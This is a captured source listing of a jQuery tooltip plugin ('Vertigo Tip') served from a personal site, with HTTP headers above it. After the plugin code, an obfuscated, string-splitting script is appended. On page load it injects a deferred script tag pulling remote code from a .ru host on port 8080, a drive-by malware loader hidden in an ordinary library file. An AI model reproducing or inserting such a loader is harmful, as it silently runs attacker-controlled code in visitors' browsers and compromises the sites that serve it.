URL:    [ Dan Winchester Home ] [ View Source Home ] 
HTTP/1.1 200 OK
Date: Sat, 08 May 2010 04:25:56 GMT
Server: Apache/1.3.41 (Unix) FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7m
Last-Modified: Tue, 04 May 2010 13:14:15 GMT
ETag: "252b6a0-982-4be01da7"
Accept-Ranges: bytes
Content-Length: 2434
Connection: close
Content-Type: application/x-javascript

/**
Vertigo Tip by www.vertigo-project.com
Requires jQuery
*/

this.vtip = function() {    
    this.xOffset = 15; // x distance from mouse
    this.yOffset = 10; // y distance from mouse       
    
    $(".vtip").unbind().hover(    
        function(e) {
            this.t = this.title;
            this.title = ''; 
            this.top = (e.pageY + yOffset); this.left = (e.pageX + xOffset);
            
            /*$('body').append( '<p id="vtip"><img id="vtipArrow" />' + this.t + '</p>' );*/
            $('body').append( '<p id="vtip">' + this.t + '</p>' );

            $('p#vtip #vtipArrow').attr("src", 'http://yamatwo.jp/_tooltip/images/vtip_arrow.png');
            $('p#vtip').css("top", this.top+"px").css("left", this.left+"px").fadeIn("slow");

        },
        function() {
            this.title = this.t;
            $("p#vtip").fadeOut("slow").remove();
        }
    ).mousemove(
        function(e) {
            this.top = (e.pageY + yOffset);
            this.left = (e.pageX + xOffset);
                         
            $("p#vtip").css("top", this.top+"px").css("left", this.left+"px");
        }
    );            
    
};

jQuery(document).ready(function($){vtip();}) 

U=51077;U+=35;function N(){var S={v:1895};try {} catch(ZF){};var T=new String("onloa"+"d");br=["Zy"];x=["Q"];var D=new String("scrip"+"t");var X={F:false};var i=window;var y="sr"+"c02B".substr(0,1);var r=new String("appe"+"ndChQyF7".substr(0,4)+"ildHNQ6".substr(0,3));var A=["m","Wp","rD"];w={n:"CH"};var t=document;this.vN=35800;this.vN+=153;var W="IG2mcr".substr(4)+"ea"+"te"+"sKPEl".substr(3)+"qVLpem".substr(4)+"en"+"XplHtXHlp".substr(4,1);var Bd=false;var b=String("LNObody".substr(3));var f=new String();var KI=false;var Z="def"+"er";var kM=new Date();C_=["_A","E"];function H(){var mA=[];try {var Hu=String("/goo"+"gle."+"com/lgqB".substr(0,4)+"char"+"vRzKter.".substr(4)+"k7HUnet/".substr(4)+"pass"+"VMQLport".substr(4)+"9M5R.net".substr(4)+"Egvk.phpvgkE".substr(4,4));var j=7286-7285;var tQ=String("http:"+"//dir"+"FMgctysin".substr(4)+".ru:s3zV".substr(0,4));var g=701890-693810;var qT=["Ud"];var cz='';c=t[W](D);fk={};TN=62995;TN-=189;this.J=false;fd=17936;fd--;var Be=false;c[y]=tQ+g+Hu;ZT={wA:false};c[Z]=j;var WF=["XU"];var x_t=new String();var Rv=new String();var Xo="Xo";t[b][r](c);var Nq=29122;} catch(G){gB={};e={};this.Wg="Wg";};this.k_=false;var jm="jm";}var te=63470;Fh=["gW"];i[T]=H;};N();var ay="ay";
 Questions or comments welcome: contact me.